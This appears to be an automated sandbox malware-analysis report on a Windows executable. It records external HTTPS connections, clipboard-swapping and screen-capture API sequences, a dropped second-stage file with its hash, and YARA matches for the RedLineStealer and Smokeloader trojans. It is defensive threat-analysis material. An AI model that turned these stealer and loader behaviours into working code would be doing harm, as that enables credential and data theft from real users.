Source: unknown	HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02121942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02121942

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Code function: 2_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_00431839

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02122361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02122361
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02122605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02122605

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0043D678	0_2_0043D678
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02148289	0_2_02148289
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0214ED47	0_2_0214ED47
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02134172	0_2_02134172
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_021476EB	0_2_021476EB
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0214D755	0_2_0214D755
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_021487C7	0_2_021487C7
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02147A5D	0_2_02147A5D
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0212EBDB	0_2_0212EBDB
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02136916	0_2_02136916
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0213398C	0_2_0213398C
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02156F26	0_2_02156F26
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02147FCE	0_2_02147FCE
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02138D16	0_2_02138D16
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02147D07	0_2_02147D07
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0214ED47	0_2_0214ED47
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0040B44C	2_2_0040B44C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00408790	2_2_00408790
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00426054	2_2_00426054
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043B068	2_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00414070	2_2_00414070
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043C020	2_2_0043C020
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00439830	2_2_00439830
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043D830	2_2_0043D830
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041B0E1	2_2_0041B0E1
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041F0E0	2_2_0041F0E0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004210E0	2_2_004210E0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00435890	2_2_00435890
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00434098	2_2_00434098
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043D0A0	2_2_0043D0A0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004180A9	2_2_004180A9
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0040A940	2_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041714B	2_2_0041714B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0040C917	2_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042B12C	2_2_0042B12C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042F130	2_2_0042F130
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042B1C0	2_2_0042B1C0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041D9E0	2_2_0041D9E0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004361E0	2_2_004361E0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004111E5	2_2_004111E5
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004059F0	2_2_004059F0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004239F2	2_2_004239F2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043C1F0	2_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0040F9FD	2_2_0040F9FD
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00425990	2_2_00425990
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043B9A1	2_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00406250	2_2_00406250
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041D270	2_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00424A74	2_2_00424A74
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00409230	2_2_00409230
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00423A34	2_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004192DA	2_2_004192DA
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043D2F0	2_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043C280	2_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00415298	2_2_00415298
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004082AE	2_2_004082AE
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004252BA	2_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041CB05	2_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00428BC0	2_2_00428BC0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004143C2	2_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00402BD0	2_2_00402BD0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00428BE9	2_2_00428BE9
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00437399	2_2_00437399
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004393A0	2_2_004393A0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00416BA5	2_2_00416BA5
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004293AA	2_2_004293AA
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004223B8	2_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00436C00	2_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00423410	2_2_00423410
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042B4FC	2_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00404CB0	2_2_00404CB0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004074B0	2_2_004074B0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041DD50	2_2_0041DD50
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00418578	2_2_00418578
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042D57E	2_2_0042D57E
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00424502	2_2_00424502
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00421D10	2_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0040DD25	2_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041D5E0	2_2_0041D5E0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00417582	2_2_00417582
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043D580	2_2_0043D580
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00427DA2	2_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004205B0	2_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042C64A	2_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00426E50	2_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042B4F7	2_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043462A	2_2_0043462A
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00435630	2_2_00435630
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004066E0	2_2_004066E0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042C6E4	2_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00430EF0	2_2_00430EF0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004256F9	2_2_004256F9
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00422E93	2_2_00422E93
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00425E90	2_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_004156A0	2_2_004156A0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041BEA0	2_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00438EA0	2_2_00438EA0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00435EA0	2_2_00435EA0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00405EB0	2_2_00405EB0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041C6BB	2_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00415F66	2_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00419770	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00409700	2_2_00409700
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042C726	2_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0042C735	2_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041DF80	2_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_00402FA0	2_2_00402FA0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B3207	2_2_024B3207
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024EB2CF	2_2_024EB2CF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E42FF	2_2_024E42FF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CB348	2_2_024CB348
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C734A	2_2_024C734A
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D1347	2_2_024D1347
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CF347	2_2_024CF347
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024ED307	2_2_024ED307
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B83C7	2_2_024B83C7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DF397	2_2_024DF397
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DB393	2_2_024DB393
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C73B2	2_2_024C73B2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D8009	2_2_024D8009
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024BC0E8	2_2_024BC0E8
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E1157	2_2_024E1157
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D8108	2_2_024D8108
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E9107	2_2_024E9107
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E6107	2_2_024E6107
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B6117	2_2_024B6117
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CE1E7	2_2_024CE1E7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CC1AC	2_2_024CC1AC
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E9607	2_2_024E9607
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D9611	2_2_024D9611
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DB763	2_2_024DB763
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B7717	2_2_024B7717
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C87DF	2_2_024C87DF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DD7E5	2_2_024DD7E5
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024ED7E7	2_2_024ED7E7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C144C	2_2_024C144C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E6447	2_2_024E6447
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DB427	2_2_024DB427
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CD4D7	2_2_024CD4D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B9497	2_2_024B9497
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B64B7	2_2_024B64B7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C9541	2_2_024C9541
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024ED557	2_2_024ED557
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CC528	2_2_024CC528
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B45D7	2_2_024B45D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E5AF7	2_2_024E5AF7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024EDA97	2_2_024EDA97
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E9A97	2_2_024E9A97
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024BCB7E	2_2_024BCB7E
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D5BF7	2_2_024D5BF7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C7BA7	2_2_024C7BA7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024BABA7	2_2_024BABA7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CD847	2_2_024CD847
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DB75E	2_2_024DB75E
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D0817	2_2_024D0817
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E5897	2_2_024E5897
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E4891	2_2_024E4891
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DC8B1	2_2_024DC8B1
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DC94B	2_2_024DC94B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B6947	2_2_024B6947
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B9967	2_2_024B9967
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CC921	2_2_024CC921
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C99D7	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B89F7	2_2_024B89F7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DC98D	2_2_024DC98D
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024DC99C	2_2_024DC99C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024E6E67	2_2_024E6E67
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B2E37	2_2_024B2E37
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D1F77	2_2_024D1F77
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B4F17	2_2_024B4F17
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024C8F35	2_2_024C8F35
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024BDF8C	2_2_024BDF8C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CDFB7	2_2_024CDFB7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CDC47	2_2_024CDC47
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B5C57	2_2_024B5C57
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024BFC64	2_2_024BFC64
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024EBC08	2_2_024EBC08
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024B3C27	2_2_024B3C27
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D4CF4	2_2_024D4CF4
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024D3C9B	2_2_024D3C9B

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe 580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe 580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB

Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: String function: 024B81D7 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: String function: 024C42C7 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: String function: 00414060 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: String function: 00407F70 appears 46 times
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: String function: 02130019 appears 121 times
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: String function: 0040FDB2 appears 124 times
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: String function: 02130987 appears 53 times

Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636

Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8BB0.tmp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: DG55Gu1yGM.exe	Binary or memory string: OriginalFileName vs DG55Gu1yGM.exe
Source: DG55Gu1yGM.exe, 00000000.00000000.2108834576.000000000047D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilemio@ vs DG55Gu1yGM.exe
Source: DG55Gu1yGM.exe, 00000000.00000003.2117383067.0000000002190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs DG55Gu1yGM.exe
Source: DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs DG55Gu1yGM.exe
Source: DG55Gu1yGM.exe, 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs DG55Gu1yGM.exe
Source: DG55Gu1yGM.exe	Binary or memory string: OriginalFilenamesOdilemio@ vs DG55Gu1yGM.exe

Source: DG55Gu1yGM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
